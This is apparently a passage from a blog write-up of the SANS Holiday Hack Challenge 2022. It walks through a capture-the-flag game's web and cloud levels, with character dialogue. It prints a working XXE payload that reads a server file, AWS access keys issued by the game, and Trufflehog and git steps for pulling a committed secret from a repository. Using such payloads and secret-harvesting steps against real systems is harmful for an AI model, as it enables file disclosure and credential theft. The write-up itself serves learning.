&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 13:40:26 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;333&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you&amp;#39;ve made a pretty bold REQuest. That&amp;#39;s ok, but even if I knew anything about such things, I&amp;#39;d only use a secret TYPE of tongue to discuss them.^She&amp;#39;s definitely hiding something.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, two new capitalized words: &lt;code&gt;REQ&lt;/code&gt; and &lt;code&gt;TYPE&lt;/code&gt;. She's giving us
a clue about the &lt;code&gt;reqType&lt;/code&gt; parameter. Maybe we should try triggering the
XXE with the &lt;code&gt;reqType&lt;/code&gt; parameter. She's also asking for a silver ring in
exchange. If you remember, the silver ring was &lt;code&gt;img1&lt;/code&gt;. Let's send
&lt;code&gt;img1&lt;/code&gt; and trigger the XXE in &lt;code&gt;reqType&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=03a5bb54-8add-4ddd-be89-358a7c0190a8.9h2D9t5bC9rE7URTCfuM0bVr0qM&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;IjdmNmM4M2VjZGEzZDc4YmFhYjA0YzU5YThkOGEwNDgxNDdlNTdmZTIi.Y7bXXw.jmgvyTtU6Y5LRouZtg0MMYAHdSo&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;260&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt; &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;img1&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
&lt;/span&gt;  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 14:45:29 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;593&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=03a5bb54-8add-4ddd-be89-358a7c0190a8.9h2D9t5bC9rE7URTCfuM0bVr0qM; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;No, really I couldn&amp;#39;t. Really? I can have the beautiful silver ring? I shouldn&amp;#39;t, but if you insist, I accept! In return, behold, one of Kringle&amp;#39;s golden rings! Grinchum dropped this one nearby. Makes one wonder how &amp;#39;precious&amp;#39; it really was to him. Though I haven&amp;#39;t touched it myself, I&amp;#39;ve been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We finally get our golden ring, with file name
&lt;code&gt;goldring-morethansupertopsecret76394734.png&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="The golden ring. It has three white stars on it." class="align-center" src="/images/sans-christmas-challenge-2022/goldring-morethansupertopsecret76394734.png" /&gt;
&lt;p&gt;Phew, that's done! I want to thank the people in the HHC Discord server for
their help, especially MichelleB, elakamarcus, and DP. They were able to nudge
me in the right directions and confirm my theories without spoiling anything.
Team work makes the dream work.&lt;/p&gt;
&lt;img alt="Akbowl, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/akbowl.png" /&gt;
&lt;p&gt;&lt;em&gt;Akbowl says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;No! That's not yours!&lt;/p&gt;
&lt;p&gt;This birdbath showed me images of this happening.&lt;/p&gt;
&lt;p&gt;But I didn't believe it because nobody is better than Akbowl!&lt;/p&gt;
&lt;p&gt;Akbowl's head is the hardest! That's what the other sporcs tell me.&lt;/p&gt;
&lt;p&gt;I guess Akbowl's head is not the smartest.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Don't be mad, Akbowl, but we get the third ring: the Web Ring:&lt;/p&gt;
&lt;img alt="The Tolkien Ring. It's a simple golden ring, like the one from Lord of the Rings, etched with an XSS payload and a JavaScript alert pop-up." class="align-center" src="/images/sans-christmas-challenge-2022/web_ring.png" /&gt;
&lt;p&gt;Right next to the fountain, Grinchum is fuming:&lt;/p&gt;
&lt;img alt="Grinchum, still frowning." class="align-center" src="/images/sans-christmas-challenge-2022/smeagolmad2.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;😏 &lt;em&gt;First lost... second lost... third lost.&lt;/em&gt; 😟&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Where are they?&lt;/em&gt; 😦 &lt;em&gt;WHERE ARE THEY, preciouses?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;No! Aaargh! Lost!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😖 &lt;strong&gt;You - naggy human. Musn't bother us.&lt;/strong&gt; 😱 &lt;strong&gt;Not its business!&lt;/strong&gt;
&lt;em&gt;grinchum..grinchum&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-the-cloud-ring"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id24"&gt;Recover the Cloud Ring&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Down and down we go, where we meet our first two Sporcs!&lt;/p&gt;
&lt;img alt="Brozeek is a Sporc. Basically an orc: Green skin, square jaw, bald head. He's wearing a long red coat, black pants, black snow shoes, a giant black belt with a golden buckle across his chest, and two spaulders." class="align-center" src="/images/sans-christmas-challenge-2022/brozeek.png" /&gt;
&lt;p&gt;&lt;em&gt;Brozeek says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Cro! Slicmer got me on the BSRS pre-sale!&lt;/p&gt;
&lt;p&gt;Now all we gotta do is swap outfits, then you can go back in there as me.&lt;/p&gt;
&lt;p&gt;Tell Slicmer you lost your wallet key, so you made a new wallet and need to
add it to the list.&lt;/p&gt;
&lt;p&gt;Then give him your wallet address, and we'll both be able to buy an NFT!&lt;/p&gt;
&lt;p&gt;Social engineering at its finest, Cro.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="Crozag is a Sporc wearing a red toga, black snow shoes, white fur shoulder pads, and a breastplate." class="align-center" src="/images/sans-christmas-challenge-2022/crozag.png" /&gt;
&lt;p&gt;&lt;em&gt;Crozag says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Bro, you usually have good ideas, but this one is really terrible.&lt;/p&gt;
&lt;p&gt;Manipulating friends with social engineering isn't cool, Bro.&lt;/p&gt;
&lt;p&gt;Let's do it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Looks like there's a cryptocoin pre-sale going on and these two Sporcs want in
on it. Let's put a pin on it for now and go on.&lt;/p&gt;
&lt;div class="section" id="aws-cli-intro"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id25"&gt;AWS CLI Intro&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We enter the Cloud Ring room, and find Jill Underpole:&lt;/p&gt;
&lt;img alt="Jill Underpole is a Flobbit with black skin and curly dark hair. She is wearing a green dress with white sleeves, a white apron, and a red cape." class="align-center" src="/images/sans-christmas-challenge-2022/jillunderpole.png" /&gt;
&lt;p&gt;&lt;em&gt;Jill Underpole says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Umm, can I help you?&lt;/p&gt;
&lt;p&gt;Me? I'm Jill Underpole, thank you very much.&lt;/p&gt;
&lt;p&gt;I'm working on this here smoke terminal.&lt;/p&gt;
&lt;p&gt;Cloud? Sure, whatever you want to call it.&lt;/p&gt;
&lt;p&gt;Anyway, you're welcome to try this out, if you think you know what you're
doing.&lt;/p&gt;
&lt;p&gt;You'll have to learn some basics about the AWS command line interface (CLI)
to be successful though.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's connect to the terminal and answer the questions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;You may not know this, but AWS CLI help messages are very easy to access. First, try typing:
$ aws help
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@4c2c76400f83:~$&lt;/span&gt; aws &lt;span class="nb"&gt;help&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Great! When you&amp;#39;re done, you can quit with q.
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY, the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@4c2c76400f83:~$&lt;/span&gt; aws configure
&lt;span class="go"&gt;AWS Access Key ID [None]: AKQAAYRKO7A5Q5XUY2IY&lt;/span&gt;
&lt;span class="go"&gt;AWS Secret Access Key [None]: qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf&lt;/span&gt;
&lt;span class="go"&gt;Default region name [None]: us-east-1&lt;/span&gt;
&lt;span class="go"&gt;Default output format [None]:&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Excellent! To finish, please get your caller identity using the AWS command line. For more details please reference:
$ aws sts help
or reference:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@4c2c76400f83:~$&lt;/span&gt; aws sts get-caller-identity
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;UserId&amp;quot;: &amp;quot;AKQAAYRKO7A5Q5XUY2IY&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Account&amp;quot;: &amp;quot;602143214321&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Arn&amp;quot;: &amp;quot;arn:aws:iam::602143214321:user/elf_helpdesk&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Great, you did it all!
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Having answered all the questions, we talk to Jill:&lt;/p&gt;
&lt;img alt="Jill Underpole, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/jillunderpole.png" /&gt;
&lt;p&gt;&lt;em&gt;Jill Underpole says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Wait, you got it done, didn't you?&lt;/p&gt;
&lt;p&gt;Ok, consider me impressed. You could probably help Gerty, too.&lt;/p&gt;
&lt;p&gt;The first trick'll be running the Trufflehog tool.&lt;/p&gt;
&lt;p&gt;It's as good at sniffing out secrets as I am at finding mushrooms!&lt;/p&gt;
&lt;p&gt;After that, it's just a matter of getting to the secret the tool found.&lt;/p&gt;
&lt;p&gt;I'd bet a basket of portobellos you'll get this done!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="trufflehog-search"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id26"&gt;Trufflehog Search&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Gerty Snowburrow is a Flobbit with white skin and shoulder-length blond hair. She's wearing a red ress with white sleeves, and a green cape." class="align-center" src="/images/sans-christmas-challenge-2022/gertysnowburrow.png" /&gt;
&lt;p&gt;&lt;em&gt;Gerty Snowburrow says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Well now, look who's venturing down into the caves!&lt;/p&gt;
&lt;p&gt;And well, who might you be, exactly?&lt;/p&gt;
&lt;p&gt;I'm Gerty Snowburrow, if you need to know.&lt;/p&gt;
&lt;p&gt;And, not that I should be telling you, but I'm trying to figure out what
Alabaster Snowball's done this time.&lt;/p&gt;
&lt;p&gt;Word is, he committed some secrets to &lt;a class="reference external" href="https://haugfactory.com/asnowball/aws_scripts.git"&gt;a code repo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you're feeling so inclined, you can try and find them for me&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The name of the objective is clearly an indication to use &lt;a class="reference external" href="https://github.com/trufflesecurity/trufflehog"&gt;Trufflehog&lt;/a&gt;, a tool to find common
secrets in several locations (S3 buckets, Git repositories or commits, etc.).&lt;/p&gt;
&lt;p&gt;Let's run &lt;code&gt;trufflehog git&lt;/code&gt; on the Git URL Gerty gives us:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ~/tools/trufflehog/trufflehog git https://haugfactory.com/orcadmin/aws_scripts
&lt;span class="go"&gt;🐷🔑🐷  TruffleHog. Unearth your secrets. 🐷🔑🐷&lt;/span&gt;

&lt;span class="go"&gt;Found unverified result 🐷🔑❓&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Detector Type: AWS&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Decoder Type: PLAIN&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Raw result: AKIAAIDAYRANYAHGQOHD&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Commit: 106d33e1ffd53eea753c1365eafc6588398279b5&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;File: put_policy.py&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Email: asnowball &amp;lt;alabaster@northpolechristmastown.local&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Repository: https://haugfactory.com/orcadmin/aws_scripts&lt;/span&gt;
&lt;span class="go"&gt;Timestamp: 2022-09-07 07:53:12 -0700 -0700&lt;/span&gt;
&lt;span class="go"&gt;Line: 6&lt;/span&gt;

&lt;span class="go"&gt;Found unverified result 🐷🔑❓&lt;/span&gt;
&lt;span class="go"&gt;Detector Type: Gitlab&lt;/span&gt;
&lt;span class="go"&gt;Decoder Type: PLAIN&lt;/span&gt;
&lt;span class="go"&gt;Raw result: add-a-file-using-the-&lt;/span&gt;
&lt;span class="go"&gt;Repository: https://haugfactory.com/orcadmin/aws_scripts&lt;/span&gt;
&lt;span class="go"&gt;Timestamp: 2022-09-06 19:54:48 +0000 +0000&lt;/span&gt;
&lt;span class="go"&gt;Line: 14&lt;/span&gt;
&lt;span class="go"&gt;Commit: 2c77c1e0a98715e32a277859864e8f5918aacc85&lt;/span&gt;
&lt;span class="go"&gt;File: README.md&lt;/span&gt;
&lt;span class="go"&gt;Email: alabaster snowball &amp;lt;alabaster@northpolechristmastown.local&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;Found unverified result 🐷🔑❓&lt;/span&gt;
&lt;span class="go"&gt;Detector Type: Gitlab&lt;/span&gt;
&lt;span class="go"&gt;Decoder Type: BASE64&lt;/span&gt;
&lt;span class="go"&gt;Raw result: add-a-file-using-the-&lt;/span&gt;
&lt;span class="go"&gt;Email: alabaster snowball &amp;lt;alabaster@northpolechristmastown.local&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Repository: https://haugfactory.com/orcadmin/aws_scripts&lt;/span&gt;
&lt;span class="go"&gt;Timestamp: 2022-09-06 19:54:48 +0000 +0000&lt;/span&gt;
&lt;span class="go"&gt;Line: 14&lt;/span&gt;
&lt;span class="go"&gt;Commit: 2c77c1e0a98715e32a277859864e8f5918aacc85&lt;/span&gt;
&lt;span class="go"&gt;File: README.md&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Looks like Alabaster commited an AWS secret to the &lt;code&gt;put_policy.py&lt;/code&gt; file.&lt;/p&gt;
&lt;img alt="Gerty Snowburrow, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/gertysnowburrow.png" /&gt;
&lt;p&gt;&lt;em&gt;Gerty Snowburrow says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Say, you got it done, didn't you?&lt;/p&gt;
&lt;p&gt;Well now, you might just be able to tackle the other AWS terminal down
here.&lt;/p&gt;
&lt;p&gt;It's a bit more involved, but you've got the credentials to get it started
now.&lt;/p&gt;
&lt;p&gt;Before you try it, you should know the difference between managed and
inline policies.&lt;/p&gt;
&lt;p&gt;Short version: inline policies apply to one identity (user, role, group),
and managed policies can be attached to many identities.&lt;/p&gt;
&lt;p&gt;There are different AWS CLI commands to interact with each kind.&lt;/p&gt;
&lt;p&gt;Other than that, the important bit is to know a bit about cloud or IAM
privilege escalation.&lt;/p&gt;
&lt;p&gt;Sometimes attackers find access to more resources by just trying things
until something works.&lt;/p&gt;
&lt;p&gt;But if they have access to the iam service inside the AWS CLI, they might
just be able to ask what access they have!&lt;/p&gt;
&lt;p&gt;You can do it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="exploitation-via-aws-cli"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id27"&gt;Exploitation via AWS CLI&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Sulfrod is a Sporc with long dark green hair. She's wearing a silver armor with a red tabard and a black belt with a golden buckle." class="align-center" src="/images/sans-christmas-challenge-2022/sulfrod.png" /&gt;
&lt;p&gt;&lt;em&gt;Sulfrod says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey! You - come here!&lt;/p&gt;
&lt;p&gt;You look like someone who knows how to do this nerd stuff.&lt;/p&gt;
&lt;p&gt;I need my terminal to be stronger, like me!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;flexes&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You're gonna do that for me so I can bust into this cloud machine thing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's try to get the ring before she can. To complete this challenge, we must
enter a series of AWS functions. The questions always point to the &lt;a class="reference external" href="https://awscli.amazonaws.com/v2/documentation/api/latest/reference/index.html"&gt;AWS
documentation&lt;/a&gt;.
It should be easy to find the proper function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Use Trufflehog to find credentials in the Gitlab instance at https://haugfactory.com/asnowball/aws_scripts.git.
Configure these credentials for us-east-1 and then run:
$ aws sts get-caller-identity
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We ran Trufflehog in the last objective. It gave us the commit and the file
containing the AWS secret. Let's clone the repository and check it out:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(Note: the URL is different because the one given by Gerty gives an HTTP
redirection. Also, sorry for ze French output, my computer is configured in
French.)&lt;/em&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git clone https://haugfactory.com/orcadmin/aws_scripts
&lt;span class="go"&gt;Clonage dans &amp;#39;aws_scripts&amp;#39;...&lt;/span&gt;
&lt;span class="go"&gt;warning: redirection vers https://haugfactory.com/orcadmin/aws_scripts.git/&lt;/span&gt;
&lt;span class="go"&gt;remote: Enumerating objects: 64, done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Total 64 (delta 0), reused 0 (delta 0), pack-reused 64&lt;/span&gt;
&lt;span class="go"&gt;Dépaquetage des objets: 100% (64/64), 23.83 Kio | 739.00 Kio/s, fait.&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; aws_scripts
&lt;span class="gp"&gt;$&lt;/span&gt; git checkout 106d33e1ffd53eea753c1365eafc6588398279b5
&lt;span class="go"&gt;Note : basculement sur &amp;#39;106d33e1ffd53eea753c1365eafc6588398279b5&amp;#39;.&lt;/span&gt;

&lt;span class="go"&gt;Vous êtes dans l&amp;#39;état « HEAD détachée ». Vous pouvez visiter, faire des modifications&lt;/span&gt;
&lt;span class="go"&gt;expérimentales et les valider. Il vous suffit de faire un autre basculement pour&lt;/span&gt;
&lt;span class="go"&gt;abandonner les commits que vous faites dans cet état sans impacter les autres branches&lt;/span&gt;

&lt;span class="go"&gt;Si vous voulez créer une nouvelle branche pour conserver les commits que vous créez,&lt;/span&gt;
&lt;span class="go"&gt;il vous suffit d&amp;#39;utiliser l&amp;#39;option -c de la commande switch comme ceci :&lt;/span&gt;

&lt;span class="go"&gt;  git switch -c &amp;lt;nom-de-la-nouvelle-branche&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;Ou annuler cette opération avec :&lt;/span&gt;

&lt;span class="go"&gt;  git switch -&lt;/span&gt;

&lt;span class="go"&gt;Désactivez ce conseil en renseignant la variable de configuration advice.detachedHead à false&lt;/span&gt;

&lt;span class="go"&gt;HEAD est maintenant sur 106d33e added&lt;/span&gt;
